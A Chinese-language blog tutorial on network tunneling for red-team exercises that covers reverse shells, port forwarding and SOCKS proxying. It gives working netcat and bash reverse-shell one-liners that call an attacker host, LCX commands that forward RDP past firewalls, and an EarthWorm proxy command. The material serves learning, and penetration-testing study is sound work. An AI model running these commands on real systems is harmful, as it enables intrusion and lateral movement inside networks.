16.隧道通信技术

隧道通信技术

隧道技术在HVV中的作用

​ 攻击者通过边界主机进入内网,往往会利用它当跳板进行横向渗透,但现在的内部网络大多部署了很多安全设各,网络结构错综复杂,对于某些系统的访问会受 到各种阻挠,这就需要借助代理去突破这些限制,因此面对不同的网络环境对于代理的选择及使用显得格外重要。

隧道的基本概念

1、反弹shell

​ 反弹Shell是指在攻击机监听某个端口,然后通过目标连接攻击机监听的端口,在攻击机反弹得到目标机的Shell。通常在目标网络有防火墙或其他因素限制,导致无法持续控制目标,或执行命令受阻等情况时需要进行反弹Shell

2、端口转发

​ 若攻克的边界主机可访问外网,则可以考虑使用端口转发进行内网穿透,端口转发就是将一个端口转发到另一个端口 例如:由于配置了防火墙只允许web访问,这个时候攻击者想访问3389端口,远程连接 是不可以的,就需要使用进行端口转发

3、正向连接、反向连接

正向连接,反向连接的概念取决于谁主动连接谁

比如如下:

攻击者主动连接受害者,那就是正向连接

受害者主动连接攻击者,那就是反向连接

4、协议隧道

​ 当我们去搭建隧道的时候,通常使用不同的协议来躲避检测,常见的有 HTTP隧道,SOCKS隧道,DNS隧道,ICMP隧道,SSH隧道等等。

反弹shell的方式

​ 反弹Shell是指在攻击机监听某个端口,然后通过目标连接攻击机监听的端口,在攻击机反弹得到目标机的Shell。通常在目标网络有防火墙或其他因素限制,导致无法持续控制目标,或执行命令受阻等情况时需要进行反弹Shell

常见反弹SHELL方式:

1、Bash反弹shell

2、NC反弹shell

3、python反弹shell

NC反弹shell

Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作。

正向反弹:

1、在靶机上运行:nc -lvvp 1111 -e C:\Windows\System32\cmd.exe

2、在攻击机上运行nc 192.168.18.244 1111

反向反弹:

1、在攻击者机器运行 nc -lvvp 1111 监听1111端口

2、nc -e C:\Windows\System32\cmd.exe 192.168.18.128 1111

Bash反弹shell

Shell也称为终端或壳,是人与内核之间的翻译官,而Bash则是Linux中默认使用的Shell

bash -i >& /dev/tcp/攻击机_IP/攻击机端口 0>&1

bash -i >& /dev/tcp/攻击机_IP/攻击机端口 0>&2

bash -i >& /dev/udp/攻击机_IP/攻击机端口 0>&1

bash -i >& /dev/udp/攻击机_IP/攻击机端口 0>&2

1、在攻击者机器运行 nc -lvvp 1111 监听1111端口

2、在靶机上运行 bash -i >& /dev/tcp/ip/1111 0>&1

端口转发

LCX是一款端口转发工具,分为Windows版和Linux版,Linux版本为PortMap。LCX有端口映射和端口转发两大功能,例如当目标的3389端口只对内开放而不对外开放时,可以使用端口映射将3389端口映射到目标的其他端口使用;当目标处于内网或目标配置的策略只允许访问固定某一端口时,可以通过端口转发突破限制

端口转发:

Lcx -listen<监听slave请求的端口><等待连接的端口>

Lcx -slave<攻击机ip><监听端口><目标ip><目标端口>

1、由于配置了防火墙只允许web访问,这个时候攻击者想访问3389端口,远程连接是不可以的,就需要使用LCX进行端口转发

2、在攻击机器上运行 lcx -listen 1111 2222 ,监听1111端口并且转发到2222端口

3、在靶机上运行 lcx -slave 192.168.142.1 1111 127.0.0.1 3389 将本地的3389端口转发到192.168.142.1的 1111端口

4、在攻击机器上进行连接 127.0.0.1:2222

应用层代理

socks隧道

​ 常见的代理工具有 regeorg,FRP,EW,NPS,Termite,通过上述的代理,配合代理客户端实现内网漫游。

​ EW全称叫做EarthWorm简称叫做EW,它是一套便携式的网络工具,具有SOCKS5服务架设和端口转发两大核心功能,并且包含着LCX工具的功能,可以再复杂的网络环境实现网络穿透EW可以已正向和反向以及多级级联的方式建立网络隧道。

正向代理

在中间靶机上运行:/ew -s ssocksd -l 1080

posted @ 2023-03-31 20:54  candada  阅读(203)  评论(0编辑  收藏  举报